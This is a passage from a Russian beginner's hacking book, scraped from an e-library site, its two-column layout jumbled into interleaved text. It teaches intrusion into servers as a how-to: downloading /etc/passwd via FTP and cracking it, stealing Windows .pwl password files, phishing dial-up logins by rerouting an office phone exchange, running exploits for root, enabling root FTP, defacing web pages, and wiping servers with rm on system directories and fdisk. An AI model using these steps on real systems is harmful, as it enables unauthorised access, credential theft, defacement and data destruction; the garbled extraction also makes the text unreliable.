WWW.DISSERS.RU

БЕСПЛАТНАЯ ЭЛЕКТРОННАЯ БИБЛИОТЕКА

   Добро пожаловать!

Вот пусть, например, на сервере где то print "
Pages:     || 2 |
-- [ Страница 1 ] --

Максим Левин УДК 681.3 ББК 32.973.26 018.2 Л363 Левин М.

Л363 Хакинг с самого начала: Методы и секреты. М.: Бук пресс, 2006. 224 с.

Хакинг с самого начала:

Методы и секреты С помощью этой книги Вы поймете как стать начинающим хакером.

УДК 681.3 ББК 32.973.26 018.2 Москва Литературное агентство «Бук Пресс» © Левин М., 2006 © Бук пресс,2006 2006 Хакинг с самого начала Хакинг с самого начала Linux Введение в хакинг RedHat — для начинающего пользователя UNIX SlackWare — для более опытного пользователя UNIX Начинающему хакеру FreeBSD — для людей, которые Для начала давайте определимся, кто уже довольно свободно такой хакер.

чувствуют себя в UNIX Хакер — это человек, который Постоянная дилемма: что лучше досконально знает организацию сети, Linux или проект BSD (FreeBSD, операционные системы сети, языки OpenBSD, NetBSD…)? Каждый выбирает программирования.

для себя.

Так же хакер знает, как построены Каждая из них имеет свои сетевые протоколы (например, TCP/IP). И преимущества и недостатки.

еще очень многое.

А теперь ближе к взлому… Почему хакеры будут всегда?

Итак, вот список популярных в сети Ответ прост — потому что все сервисов:

сделанное людьми — может ими же быть ftp взломано! А так же потому что всегда будут администраторы с именем «ЛАМЕР telnet ДНЯ».

smtp Итак начнем… http Для начала вам необходимо найти pop3 дистрибутивы следующих сетевых ОС:

3 Хакинг с самого начала Хакинг с самого начала Цифры — это порядковый номер электронная почта проходит через этот того или иного сервиса. порт. Simple Mail Transfer Protocol — простой протокол передачи почты.

Итак, все по порядку:

HTTP (80) FTP (21) Hyper Text Transfer Protocol — Наверное, все пользовались FTP, Протокол передачи гипертекста.

если нет, то все впереди.

Ну, наверное, этот протокол знают Что такое FTP? File Transfer Protocol все, кто когда либо пользовался Internet.

(протокол передачи файла). Так вот, когда Все web серверы, все странички (по вы подключаетесь через FTP на сервер, то большей части) работают через этот порт.

вы автоматически подключаетесь к порту Одним словом — все, что вы грузите в 21 и дальше, используя команды, ваш браузер доставляется к вам через этот пользуетесь этим сервисом.

порт.

TELNET (23) Так как этот протокол существует Это тот порт, через который давно и при этом претерпел мало происходит большинство взломов (после изменений, то взлом через него обнаружения ошибки), поэтому многие практически невозможен даже для провайдеры и серверы с нормальными профессионала! Исключая случаи, когда администраторами отключают этот порт.

программа на web сервере с «дырами» в безопасности.

Что можно сделать если вы имеете telnet доступ? Ну, на верное все(!) от POP3 (110) переформатирования винчестера (на Через этот порт вы получаете удаленной машине конечно!) до электронные сообщения к себе в Mail изменения ядра системы.

Agent (например, Microsoft Outlook).

SMTP (25) Вот вы теперь и разбираетесь Вы, наверное, не раз в жизни (немного) в основных протоколах.

отсылали электронную почту? Так вот, вся 5 Хакинг с самого начала Хакинг с самого начала Так как взломать? Не спешите, не Существует много программ, все так просто… расшифровывающих этот файл, поэтому я не советую сразу находить их, потому что Для данного этапа вашего развития главное — это списать этот файл, а как хакера вам необходимо знать основы расшифровать это уже не проблема.

UNIX систем в целом. Так вот — очень (ну очень) краткое описание UNIX. Итак, ломаем провайдера!

Первое, что нужно сделать — узнать Файловая система реальный IP адрес.

В отличие от Windows (далее Делается это очень просто:

MUST_DIE), где имена дисков (A, B, C, D…) и путь к файлу выглядит как: tracert (под UNIX traceroute) w3.cnn.com C:\MUST_DIE\die.com и вторая строка — это то что нам в UNIX существует один основной каталог нужно… /, а устройства (такие как CD ROM) Оттуда (из второй строки) берем IP можно найти в директории (например, адрес (IP — уникальный адрес для каждой /cdrom).

машины в сети Internet. Пример В начале эта система вам покажется 195.55.55.55 (каждое число может быть в очень странной — нет буквенных диапазоне от 0…255 т.е. 0 255.0 255. идентификаторов. Но в итоге это в сотни 255.0 255).

раз удобнее.

Теперь пишем ftp (и после пробела Далее.

пишем этот IP адрес). Где писать? В MS DOS PROMPT или в сеансе MS DOS.

Все настройки системы находятся в каталоге /etc. Файл с паролями (обычно) Теперь (немного подождав) мы находится в каталоге /etc под именем видим строчку login. Здесь пишем ваш passwd т.е. полный путь к нему — логин для входа в систему Internet.

/etc/passwd.

Теперь видим строчку Password.

7 Хакинг с самого начала Хакинг с самого начала Здесь пишем ваш пароль для входа в ftp программу (т.е. обычно это директория Internet. MUST_DIE). Вот и ищите его там, если нет — то смотрите команду find.

И мы получаем что то типа вот этого (честно говоря очень маленькая Как ни жаль, но таких провайдеров вероятность того, что ваш провайдер все меньше и меньше. Но они настолько глуп, но с чем черт не шутит! существуют, и, к тому же, появляются Один популярный сервер w3.dos.net новые!

взломали еще Не огорчайтесь, если у вас ничего не проще — подключились к сервису IIS вышло! Это только начало… (Internet Information Server), а там вообще Правило номер один: главное — не было пароля!

стремление и желание найти «дырки», а Так вот — продолжаем.

так же умение ими воспользоваться.

Видим:

Directory /home/usr/ваш_логин not Как же надо хакать и с чего начать?

found Для начала попробуй Logging in "/" просканировать несколько IP по разным Вот и все, считайте, что взлом портам. Ты увидишь, что некоторые окончен.

компьютеры отвечают, а некоторые нет.

Просто напишите строку:

Некоторые компьютеры ответят и только некоторые, возможно некоторые из ftp> (писать здесь) get /etc/passwd найденных будут плохо защищенными и Вы получили файл с паролями.

ждать пока ты их взломаешь.

«Куда?» — спросите вы. Это легко узнать, запустив команду find под MUST_DIE и Небольшое отступление: Ты скажешь искать нужно passwd файл (без что это за фигня такая — порты и прочая расширения). Обычно он записывается в лабуда? Порт — это адрес определенного ту директорию, из которой вы запустили сервиса, запущенного на данном 9 Хакинг с самого начала Хакинг с самого начала компьютере в Internet. Также их очень логина/пароля, то сервер через некоторое часто называют TCP/IP (Transfer Control время пошлет тебя подальше. Если тебе Protocol/Internet Protocol) порты, так как нечего делать, то можешь попытаться на них может обратиться другой поперебирать пароли, а когда надоест, пользователь из Internet.Примером может можешь читать дальше.

служить принтер или модем — они ведь Если попробовать приконнектиться тоже обращаются с компьютером через к серверу не через 23 порт, а через какие свои порты.

нибудь другие порты, то при большом Как только человек выходит в везении сервер тебе скажет что ты Internet, он сразу же получает свой приконнектился удачно и ты сможешь уникальный IP адрес (например, ppp103 3 легко найти нужную комбинацию. Это 5.dialup.glasnet.ru). После этого любой самый простой способ взламывания желающий может воспользоваться твоими серверов. Можно проявить себя как ресурсами (которые доступны) также, как «Белый хакер в шляпе» — посылаешь и тебе ресурсы других. Для того, чтобы письмо сисадмину и уходишь с этого воспользоваться услугами, необходимо сервера (типа незаконно и все в таком указать IP:port (к примеру, 195.34.34.30:21 духе). Ну а если ты никогда не слышал — для того, чтобы попасть на FTP сервер про zone.ru). 273 275 статьи УК РФ, то… ну, я думаю, ты сам догадаешься, что тебе делать… Теперь ты, возможно, приконнектишься к какому нибудь Небольшое отступление: Сервак — серваку к порту 23 (порт telnet) (Пуск компьютер, подключенный к Internet.

выполнить telnet ip:port. Если не Сервис — программа, запущенная на указывать порт, то по умолчанию это 23 серваке на определенном порту. Каждая порт). Если ты нормально такая программа должна отвечать на приконнектишься, то увидишь определенные программы. Если ты дашь приглашение с просьбой ввести логин и этой программе правильную команду, то пароль. Но поскольку ты не знаешь она должна что то сделать для тебя.

11 Хакинг с самого начала Хакинг с самого начала Самый простейший пример — сервис C:\твой_Windows\SERVICES\. В NT это — «ЭХО» или по другому — генератор C:\WINNT\SYSTEM32\DRIVERS\ETC\SE символов (порт 19). Если ты RVICES. Ну а в Юниксе это /etc/services/ приконнектишься телнетом по этому (хотя если у тебя стоит Юникс, я думаю порту к компьютеру, у которого запущен тебе это объяснять не надо). Эти порты этот сервис, эта программа будет называются хорошо известными, так как реагировать на любой нажатый тобой они используются для наиболее символ и будет показывать его в окне распространенных сервисов (WWW, е mail, телнета. Все что тебе нужно — FTP, news, telnet). Например, SMTP — приконнектиться к серваку, на котором отправка почты — 25 порт, запущен нужный тебе сервис. POP3 — прием почты 110 порт, WWW — 80 порт, FTP — 21… Другой пример — это сервис поиска нужного человека в сети (Finger). Если ты Ты можешь быть сбит с толку тем, задашь этой программе искать какого либо то что существует куча прог для человека с другого хоста и при этом сканирования всего, чего только возможно программа finger запущена на сервере, а и хакеры ими очень часто пользуются. Но!

также пользователь не сделал так, чтобы При этом ты можешь нарваться на его эта программа не находила, то ты неприятности, так как у сисадминов есть получишь об этом пользователе очень привычка (далеко не лучшая в твою много полезной инфы. пользу) просматривать логи всех коннектов и по каким портам, а так же Какие сервисы запущены, на каких попытки взлома их сервера. Некоторые портах и где об этом узнать? Порты сисадмины свободно разрешают сканить находятся в диапазоне от 1 до 1024 и их серверы, а некоторые, увидев что называются «хорошо известные порты» нибудь не ладное, сразу откапывают твоего (well known). Список использованных сисадмина и жалуются ему какой ты портов можно посмотреть в файле на нехороший (в исключительных случаях это компьютере, который называется может окончиться тем, что тебя отключит «services». В Windows он находится в из Internet твой пров навсегда!). В США 13 Хакинг с самого начала Хакинг с самого начала сканирование разрешено и сами не нужно или пустой пароль на полный сисадмины часто сканят друг друга в целях доступ. Из ошибок программ самые нахождения дырок. Но от греха подальше распространенные — переполнение буфера если кого нибудь собираешься сканить из обмена у программ, созданных для добрых побуждений — лучше попроси Internet. Очень часто это используют для разрешение или хотя бы уведоми об этом того, чтобы перехватить контроль над сисадмина. серваком и потом делать с ним все что твоей душе угодно.

Так что же такое дырки в системах, о которых столько говорят? Дырка — что Ну а теперь перейдем к очень нибудь в системе, которое позволяет кому известному сейчас виду атак — нибудь контролировать систему в обход Эксплоитам. Ты уже наверно не раз сисадмина.Существует очень много типов слышал об этой атаке, но не понимал, что дырок. Это может быть неправильно это такое и как этим пользоваться. Так сконфигурированная программа, ошибка в вот. Эксплоит — это программа, самой программе… Наглядным примером написанная на Си++, использующая плохо сконфигурированной программы дырки в системе для получения прав рута может служить старая версия программы (root) — самого главного человека, sendmail (если сисадмин оставлял команды которому доступно ВСЕ!!! К примеру это wiz и debug или дал директории так называемая FTP Bounce дырка, неправильные права доступа на FTP заключаемая в том, что FTP сервер сервере, то любой желающий мог скачать (служит для скачки/закачки файлов с файл паролей). В таких случаях вся вина сервера/на сервер) настроен так, чтобы лежит на сисадминах, так как ошибка переадресовывать запрос пользователя на допущена при конфигурировании, а не другой компьютер. По идее эта фича из за самой программы. вообще на фиг не нужна (в смысле для сисадминов — нам она как раз таки и Другой очень известный и нужна). Это только создает возможность распространенный баг — расшаривание взлома, так как эта фича позволяет ресурсов в Windows когда это совершенно любому человек просканить порты другого 15 Хакинг с самого начала Хакинг с самого начала компьютера и представиться компьютеру часто вообще меняют прогу, которая FTP сервером, с которого идет стоит, только оставляют то же имя и переадресация и этот человек получит номер версии чуть чуть переделывают.

«ключи от квартиры где деньги лежат». Конечно же все дырки рано или поздно Вообще эксплоиты наиболее практичные и фиксят и нужно стараться пользоваться довольно таки легко применяются (если новыми эксплоитами. Ну, а теперь самое голова с руками растет откуда надо). С главное — как же найти эти дырки?

эксплоитом можно хорошо поиздеваться Для начала посмотри, что у тебя из над сисадмином, а также над его системой сервисов есть на компе — набери команду (ой — а зачем вот эти файлы — они тут netstat a (в Пуск Выполнить) и ты ва а а аще не нужны!).

увидишь что то типа этого:

Эксплоит хорош еще тем, что он не Active Connections ломает систему (сам справишься!), а Proto Local Address только дает тебе «ключи». Как ты знаешь, Foreign Address State сейчас серваки стоят как минимум на трех TCP localhost: типах платформ: NT, VMS и UNIX. У них 0.0.0.0:0 LISTENING куча разных версий и типов — UNIX TCP localhost: делится на BSD, AIX, SCI, Sun OS, Irix и 0.0.0.0:0 LISTENING (наверно) твой любимый Линукс. Ну и TCP localhost: конечно же каждая версия глючит по 0.0.0.0:0 LISTENING разному и поэтому под разные типы и TCP localhost: версии существуют эксплоиты так сказать 0.0.0.0:0 LISTENING «нужного калибра», ведь как ты TCP localhost: понимаешь эксплоит, сделанный под NT, localhost:1027 ESTABLISHED не будет пахать под UNIX, а сделанный TCP localhost: для Sun OS не будет пахать под Линукс localhost:1026 ESTABLISHED (ну, хакеру не проблема переделать TCP localhost: эксплоит — на то он и хакер). Ну а разные 0.0.0.0:0 LISTENING версии не будут пахать, так как очень TCP localhost: 17 Хакинг с самого начала Хакинг с самого начала 0.0.0.0:0 LISTENING Address State TCP localhost:nbsession TCP localhost: 0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING UDP localhost:135 *:* TCP localhost: UDP localhost:nbname *:* 0.0.0.0:0 LISTENING UDP localhost:nbdatagram *:* TCP localhost: 0.0.0.0:0 LISTENING Хммм… вроде ничего интересного.

TCP localhost: Ну начнем разгребать, что это такое 0.0.0.0:0 LISTENING появилось.

TCP localhost: Мы видим, что у Local Address (твой 0.0.0.0:0 LISTENING комп) прослушиваются порты 135, 137, TCP localhost: и nbsession (в общем это 139 порт 0.0.0.0:0 LISTENING прослушивается… можешь написать netstat TCP localhost: an, чтобы увидеть не название портов, а 0.0.0.0:0 LISTENING их номера. Насчет этих портов можешь не TCP localhost: беспокоиться — это часть Microsoft 0.0.0.0:0 LISTENING Networking и они нужны для поддержки TCP localhost: LAN (локальной сети). Теперь зайди в 0.0.0.0:0 LISTENING Internet и топай, допустим на TCP localhost: www.uxx.com, хотя нет, лучше на localhost:1027 ESTABLISHED www.happyhacker.org. Одновременно TCP localhost: телнеться на какой нибудь сервак (ну localhost:1026 ESTABLISHED допустим www.whitehouse.gov). Теперь TCP localhost: снова жми 0.0.0.0:0 LISTENING netstat a и вот что у тебя примерно TCP localhost: должно получиться:

0.0.0.0:0 LISTENING Active Connections TCP localhost: Proto Local Address Foreign 0.0.0.0:0 LISTENING 19 Хакинг с самого начала Хакинг с самого начала TCP localhost: пределами этих 1024 портов. Так понятно?

zlliks.505.ORG:80 ESTABLISHED К примеру, браузер может открывать до TCP localhost: четырех портов — с 2508 по 2511.

zlliks.505.ORG:80 ESTABLISHED Теперь ты возможно захочешь TCP localhost: посканить порты друга? Лучший способ zlliks.505.ORG:80 ESTABLISHED сделать это и не бояться быть выкинутым TCP localhost: из Internet своим провайдером — попроси zlliks.505.ORG:80 ESTABLISHED друга (подругу) набрать netstat r. Тогда у TCP localhost: него появится что то типа:

whitehouse.gov:telnet ESTABLISHED Route Table Теперь посмотрим, что в этот раз за Active Routes:

лабуду выдало. Те же порты, что и по Network Address Netmask Gateway началу, вот только добавилось несколько Address Interface Metric новых активных портов — 4 коннекта с 0.0.0.0 0.0.0. zllinks.505.ORG по 80 порту и коннект с 198.59.999.200 198.59.999.200 whitehouse.gov телнетом. Это полная 127.0.0.0 255.0.0. статистика того, что происходит с твоим 127.0.0.1 127.0.0. компом и Internet.

Так ты узнал настоящее имя сервака 198.59.999.0 255.255.255. www.happyhacker.org (zlliks.505.ORG). По 198.59.999.200 198.59.999.200 идее у тебя должен возникнуть вопрос — а 198.59.999.200 255.255.255. какого черта есть порты, у которых номера 127.0.0.1 127.0.0. больше 1024??? Так вот, если ты помнишь начало главы, то я там говорил, что эти 198.59.999.255 255.255.255. порты ждут коннекта к ним. Но вот если 198.59.999.200 198.59.999.200 эта программа коннетиться куда нибудь, 224.0.0.0 224.0.0. то ей помимо своего порта еще нужен 198.59.999.200 198.59.999.200 какой нибудь порт для приема 255.255.255.255 255.255.255. информации, и этот порт берется за 198.59.999.200 0.0.0. 21 Хакинг с самого начала Хакинг с самого начала mail как UUPC Чернова. А также Active Connections некоторые туповатые провайдеры все еще Proto Local Address предоставляют вход в систему как online Foreign Address State так и offline под одним паролем. Остается TCP lovely lady: самое простое — переписать файлик init mack.foo66.com:smtp ESTABLISHED или init1 с каталога \UUPC. Там будет прописан как login так и password.

Gateway Address и Interface покажут Пользуйтесь им на здоровье. Ho не твой реальный IP (ну или IP сервера, если забывайте про то, что «жадность фраера ты сидишь через локальную сеть). Учти, сгубила».

если твой друг сидит в локалке, то прежде 10 раз подумай, чем его сканить, а то При более сложном варианте вы сисадминам очень не нравится, когда запускаете на машину user’a вирус или какой недохакер (как они считают) прогу резидентную, отслеживающую пытается их поломать и могут пойти на появление строчки login:. Дальше остается все меры, лишь бы отомстить и грабать клавиатуру и записать полученное поразвлечься (иногда самое безобидное — в файл.

синий экран).

Если юзверь относительно Вообще то под таким грамотный и не просто умеет качать распространенным термином, как взлом почту, а работает более «круто» в Netscape, Internet подразумевают сразу несколько используя SLIP & PPP, то обратите разных вещей. Во пеpвых: незаконное внимание — при таком качестве связи, как подключение к провайдеру и халявные y нашего Совка, связь обрывается подключения. Как же можно это частенько. Очень редко можно увидеть, осуществить? Самый простой вариант — чтобы кто то из них при соединении украсть чужой пароль. В наше время при набирал логин и пароль вручную. Часто огромном количестве тупых юзверей сие это все делает скрипт командами transmit не представляет никакого труда. Так как и им подобными. А все настройки, хитрец, подавляющее большинство пользователей держит под своим паролем в Windows. Как пользуется таким популярным пакетом e 23 Хакинг с самого начала Хакинг с самого начала известно, на всякую хитрую жопу… а затем дропнуть линию. После двyх тpех находится очень быстрое решение попыток (вдруг он неверный пароль проблемы: стоит только поискать файлик с введет) верните АТС в нормальное расширением.pwl. Там Windows хранит состояние. А то прецеденты с все практически настройки по каждому последующей раздачей слонов и пряников юзверю. Включая и пароли. Тем паче, что уже бывали.

шифрует она все это примитивным Если удалось раздобыть login/passwd, вариантом DES. Ho алгоритм шифрования то имея пароль с минимальными в каждом релизе разный. Однако, имея в пользовательскими привилегиями хочется руках чужой.pwl файл, создав несколько получить их гораздо больше. С своих с именами 1,2,3,4 и аналогичными минимальными привилегиями получить паролями, можно проследить интересную статус root — задача не одного дня. Ho зависимость, которая и выведет вас к начинать с чего то надо. А начнем мы с желаемому результату.

того, что узнаем, с какой системой имеем Если на машину юзера доступа нет, дело. В настоящее время провайдеры то к решению проблемы можно подойти и висят на самых популярных UNIX:

другим путем. Справедливости ради надо FreeBSD, BSDI, SCO open server, Linux.

заметить, что практически лавинная доля Некоторые, правда, используют такую соединений приходится на телефонные экзотику как NexStep, UnixWare, Solaris, линии. Дальше — лучше. Наверняка у вас Aix, HP UX, VAX ORX5.12. Встречаются в офисе есть мини АТС. уникумы, работающие с Xenix. Ho Перепрограммировать ее, чтобы звонки с несмотря на видимое обилие данного номера перероучивались на ваш операционных систем, все они имеют — плевое дело. Осталось только запустить практически одинаковую систему защиты терминальную программу BBS, в заставке и идентификации пользователей и их указать заставку вашего провайдера. И ресурсов, которые передавались по юзер ведь купится! Ha 100%. Введет и наследству от AT&T UNIX с 1971 года.

login, и password. Проверено уже, и не раз. Стандартные средства защиты в UNIX:

Теперь осталось выдать ему кучу ошибок, 25 Хакинг с самого начала Хакинг с самого начала защита через пароли;

Расшифровкой этого занимаются программы типа jack, защита файлов;

crackerjack, blob и множество подобных.

команды su, newgrp, at, prwarn, Успех напрямую зависит от данной sadc, pt_chmod;

операционной системы. Чтобы успешно расшифровать passwd, необходимо, как шифрование данных.

минимум, иметь две пары логинов, Любой пользователь UNIX имеет паролей расшифрованных и свой пароль, без которого он не может зашифрованных. Напустив на passwd от включиться в систему, писать/читать Linux 2.1.3 крякалку паролей blob и имея почту. Практически во всех UNIX пароли пять пар известных паролей, в опытном находятся в /etc/passwd. Этот файл варианте за 20 минут успешно содержит информацию о пользователе, его расшифровываются все пароли. Но пароле и уровне привилегий.

проблема в том, что алгоритмы шифрования очень улучшаются с каждой Дописать в этот файл информацию о новой версией системы, а в таких своем login/passwd и уровне привилегий коммерческих UNIX как SCO Open Server может только root. Ты можешь его только 5 имеется очень навороченные системы читать.

криптования. К примеру, если SCO 3 с Ho что же мешает уровнем защиты от 1,2,3 сломалась в переписать/прочитать его и пользоваться течение 3 часов перебора, то 4,5 где то за чужими login’ами? Прочитать можно. И с четверо суток, 6 так и не удалось огорчением увидеть, что не все так в поломать.

жизни просто. Да, там хранится login пользователя. Ho сам пароль хранится Что такое exploit?

только в зашифрованном виде. И вместо пароля в лучшем случае увидишь Exploit — это небольшие абракадабру типа #@4OFIU`0346`e.

программки, которые помогают вам взламывать сервер. Эти программки 27 Хакинг с самого начала Хакинг с самого начала разрабатываются для конкретной версии случае он колеблется от 5000 до +5000 с того или иного сервиса (daemon) на прибавлением +100, т.е. примерно так:

сервере. 5000 4800… 0 100 200… 5000).

Вот списки популярных exploit’ов:

Не удивляйтесь, если все эти шаги ftp — wu ftp2.42;

wu ftp2. не привели к желаемому результату.

qpopper Просто скорее всего сервер, который вы пытаетесь атаковать, уже пропатчили… proftp Патч (patch) — небольшая прога, И еще тысячи им подобные.

которая закрывает известные ей «дыры» Большинство exploit написаны в (bugs) в системе безопасности.

виде openSource (открытый код), а так же Вот пока и все, что вам нужно знать на языке программирования С++.

про эксплоит.

Большинство из них требует для запуска UNIX. Вот простенький пример Что такое root?

использования exploit (после того как вы его списали и распаковали) UNIX wu Root — это главная цель всех ftp2.42 (подразумевается что вы root):

взломов. Root — это корень сервера, root — это суперпользователь (super user), #gcc имя файла с окончанием.с который может делать с компьютером все, #./a.out имя файла после что ему захочется!

компиляции (если не было ошибок при Как получить root? Получить root ней) очень сложно (конечно, если не Нас спрашивают IP адрес сервера, учитывать, что есть администраторы — который мы атакуем и offset — параметр, полные ламера, я порой удивляюсь — за зависящий от компилятора, что им платят деньги).

использованного при создании сервиса (демона) на удаленной машине (в данном 29 Хакинг с самого начала Хакинг с самого начала Так что же делать? Вот здесь как раз самые важные настройки сервера), есть и приходят на помощь известные нам файл ftpusers (в BSDI UNIX), так по exploit. Кстати, возможно и вы сможете default (умолчанию) root доступ к порту когда то написать exploit. Что для этого (ftp) запрещен. Вы с помощью редактора нужно? Много пива, знание C++, блок joe (на удаленной машине) редактируете сигарет, дни и ночи, проведенные за этот файл и разрешаете root использовать изучением кода демона. ftp.

Цель (большинства) exploit — в Как? Просто поставьте перед root remote access (удаленном доступе), т.е. знак #, а затем запишитесь (Ctrl+k, затем запустив правильно exploit (при условии, x).

что атакуемый сервер не пропатчен против Пример (вы — root):

него и версии совпадают) вы в #joe /etc/ftpusers большинстве случаев получите remote В редакторе вставляем перед root access.

символ #, затем жмем Ctrl+k, а затем x.

Что дальше?

Все, файл изменен, теперь можно Ну вот, мы забрались в систему выходить из системы (а то вдруг вас админ (давайте просто представим это), что же просечет?).

теперь делать?

Кстати, имея root доступ к серверу, 1. Мы знаем систему (версию, вы можете изменить пароль к root и даже название).

отформатировать жесткий диск… Вот было 2. Мы нашли дырку в ней. бы смешно посмотреть на администратора сервера, который придя на работу (после 3. Мы обязательно продумали, что большого бодуна) увидит, что жесткий делать дальше перед взломом.

диск абсолютно чистый!

Так вот, многие взломы в сети Теперь пишем:

заканчиваются изменением странички.

#ftp ip_address or host_name Значит так: в каталоге /etc (где находятся 31 Хакинг с самого начала Хакинг с самого начала login: здесь пишем root Результат:

password: здесь пишем пароль!

Unix password too weak, please И вот черт! Мы забыли изменить retype password:

root пароль! (Я нарочно это сделал, чтобы Что это значит?

вы привыкали к возможным ошибкам и Это значит, что UNIX система — не еще раз обратили внимание на глупый MUST_DIE!

следующее)… И запомните навсегда — пароль Что делать? Правильно!

должен быть типа: Abc04k9834z — Возвращаемся к exploit! Но сначала неудобно? А придется запомнить это красиво выйдем… правило!

Вводим любую комбинацию Кстати, если вы будете когда то символов… подключаться к провайдеру, то выберите И… примерно такой пароль! Или пароль — русское слово, напечатанное в режиме Система пишет:

английского языка! Например, слово login incorrect ЯКРУТ (вместе) — будет выглядеть как М да… шанс был 1 из 1.000.000 (если ZRHEN.

не больше), что вы угадаете пароль — это Но в данном случае можно еще раз явно доказывает, что подбор при взломе ввести 12345 и получим:

(ручной) практически исключен.

Retype password: и еще раз пишем А теперь опять exploit… (предположим вы опять зашли в систему, Все, пароль изменен! Переходим вы опять root). Просто введите:

опять к FTP.

#passwd #ftp Получим:

ftp>open ip_address or host_name New unix passwd: здесь пишем (как вы заметили, здесь немного по (чтобы не забыть) 33 Хакинг с самого начала Хакинг с самого начала другому написано, но результат не Text Transfer Protocol) и, немного меняется) подождав, введите что то типа:

login: root we hack you password: В ответ на это вы получите кучу И вот мы в системе! (Вы не забыли, тэгов, а внизу название и версию сервера зачем мы здесь? Мы хотели изменить (не правда ли, оригинальный способ?).

WWW страницу!) Кстати, привыкайте к Теперь вы можете выходить из ftp оригинальности в своих действиях и к написав bye: нестандартному подходу, т.к. нет ни одного общего алгоритма взлома ftp>bye различных систем. Так же поймите, что И вот мы вышли из системы.

метод взлома — это своеобразное Вы спросите — зачем мы столько искусство и каждый изощряется в нем по мучились с ftp, если мы через него ничего своему!

не изменим?

Вот мы и узнали версию сервера… А я отвечу — мы тренируемся!

Что же дальше?

Теперь потренируемся с командой А дальше вот что!

telnet (порт 23), которая соединяет нас с удаленным сервером. Где находится программа сервер?

Опять же запускаем exploit и после Это (иногда) довольно просто удачного входа в систему, пишем: определить: предположим, сервер называется apache (очень #telnet 127.0.0.1 распространенный web сервер). Пишем:

127.0.0.1 — это локальный адрес #which apache машины называемый loopback — т.е.

машина работает сама с собой через этот Получаем:

ip;

80 — это порт протокола HTTP (Hyper /usr/sbin/apachectl 35 Хакинг с самого начала Хакинг с самого начала или И вот мы видим все содержимое сервера (www). Дальше пишем:

/usr/local/sbin/apachectl #rm index.htm (index.html) Это толком ничего нам не дает, кроме того, что мы теперь знаем, где Что в итоге удалит главный файл.

находятся файлы конфигурации, в Пишем:

которых есть строка DocumentRoot #joe index.htm (index.html) (httpd.conf). Этот файл находится:

Теперь (в редакторе joe) пишем что /usr/etc/apache то типа:

или This site hacked by Vasya /usr/local/etc/apache Жмем Ctrl+k, а затем x.

Чаще всего (исходя из Так же в редакторе joe вы можете вышеописанного) apache DocumentRott написать что угодно.

(home_dir) находится:

/www или Убить «демонов»!

/home/www Демон — это процесс в UNIX или системе, который предоставляет вам /usr/local/www некоторые услуги. Например, в Internet:

Пишем:

Ftpd (ftp daemon) port #cd home_dir Telnetd (telnet daemon) port где home_dir — каталог www. Затем Smtpd (smtp daemon) port удаляем index.htm или index.html. Как узнать какой?

Httpd (http daemon) port Пишем:

Pop3d (pop3 daemon) port #ls full | more 37 Хакинг с самого начала Хакинг с самого начала #cd /boot Предположим — вы взломали #rm * систему и просто хотите «западлить» ей.

#cd /bin Тогда (от root’a) пишем:

#rm * #killall httpd #cd /sbin И вот результат — web страница #rm * системы не доступна.

#cd /usr/bin #killall ftpd #rm * #cd /usr/sbin Результат — ftp сервис недоступен.

#rm * Правда, администратор проще Эти строки, после выполнения простого запустит все обратно:

удалят все жизненно необходимые файлы Администратор (от root’a):

для системы… (кроме /etc, но об этом #httpd start (если Linux) позже).

#apachectl restart (если FreeBSD и Будьте аккуратны, т.к. команда rm некоторые другие ОС с web сервером находится в одном из каталогов:

apache) /bin А теперь ftpd:

/sbin #ftpd (все очень просто!) Как сделать чтобы система вообще /usr/bin навернулась. Довольно просто. Вот пример /usr/sbin простейшей атаки, цель которой — уничтожить информацию на винчестере Если ее удалить, то дальнейшее атакуемого сервера (от root’a):

удаление будет невозможно (с помощью команды rm конечно). Чтобы этого избежать — просто узнайте где эта #cd / команда находится:

#rm * (удаляет все (!) файлы в корневом каталоге) #which rm 39 Хакинг с самого начала Хакинг с самого начала Эта строка выдаст вам директорию, в Теперь жмем w и Еnter.

которой находится команда rm. Удаляйте Все! Система вообще навернулась!

ее последней.

(Компьютер даже загрузится не сможет!) Хотите красиво заподлить?

Есть в UNIX команда dd, наверное Без проблем: самая опасная из всех существующих (разумеется при неумелом использовании).

#cd /etc Вот, что я однажды натворил. Работал я #rm * тогда под SlackWare:

Это удалит все настройки системы!

Два винта:

А теперь пишем:

hda1 slack ;

hda2 dos ;

hdc #reboot slack Что в итоге (после сотни сообщений И вот я пишу (моя проблема была в об ошибках) перегрузит сервер или просто том, что DOS, как обычно, переписал подвиснет его… MBR (Master Boot Record) и я не мог Вот и все, система на 100% грузить hdc2 (SlackWare). Вы наверно неработоспособна… спросите — а разве нельзя грузить UNIX с дискеты? Конечно можно! Но у меня не Вы очень злой на этот сервер? Тогда работал флоп…):

пишем (от root’a):

dd /dev/hda /dev/hdc 0 #fdisk А теперь по русски:

Затем вводим p (это выведет нам все разделы винчестера. А теперь (например, Копируем первые 512 байт с одного если разделов 4), пишем:

винта на другой. Что в этих 512 байтах?

Master Boot Record (MBR). Значит я d (enter), 4 (enter) нечаянно нажал не «ту» кнопку и… ничего d (enter), 3 (enter) не произошло… d (enter), 2 (enter) d (enter), 1 (enter) 41 Хакинг с самого начала Хакинг с самого начала Я ввожу строку еще раз и забываю Способы проникновения в указать 512 (в конце строки)… удаленную систему 99% провайдеров вы так просто не И что???

взломаете (сразу), поэтому забудьте (на А вот что — команда dd начала время) про их взлом! Ведь там же не копировать раздел (весь) hda в hdc!

полные ламера сидят (хотя и такое бывает… И летит полностью раздел hdc!

А теперь непосредственно шаги (или Я за долю секунды понял, что сделал действия) для взлома.

что то не то… и нажал Ctrl+С, что прервало выполнение программы dd. Но Вы должны просканировать все мои усилия оказались напрасны… атакуемый хост (сервер) (пример с команда dd уже скопировала около 20 Кб с использованием программы portscanner):

одного винта на другой… #portscanner 55.55.55.55 1 Винт пришлось переразбивать и где 55.55.55.55 — IP адрес хоста;

1 — с переформатировать… какого порта начинать;

1024 — каким закончить.

В результате я потерял около 8 часов времени при переинсталляции всего что Далее (по истечении n го времени) было, неделю на скачивание всех нужных мы получаем ответ (по большей части мне программ с Internet и около 2 х стандартный):

месяцев моих работ… Отсюда вывод: никогда не экспериментируйте с такого рода программами как dd и fdisk.

А теперь, как говорится ближе к телу Теперь запускаем следующие (я имел ввиду делу).

команды:

43 Хакинг с самого начала Хакинг с самого начала #telnet HOST_IP CGI программы выполняются на #telnet HOST_IP сервере, а данные выводят вам в виде html #telnet HOST_IP или других видов mime types (например #telnet HOST_IP gif).

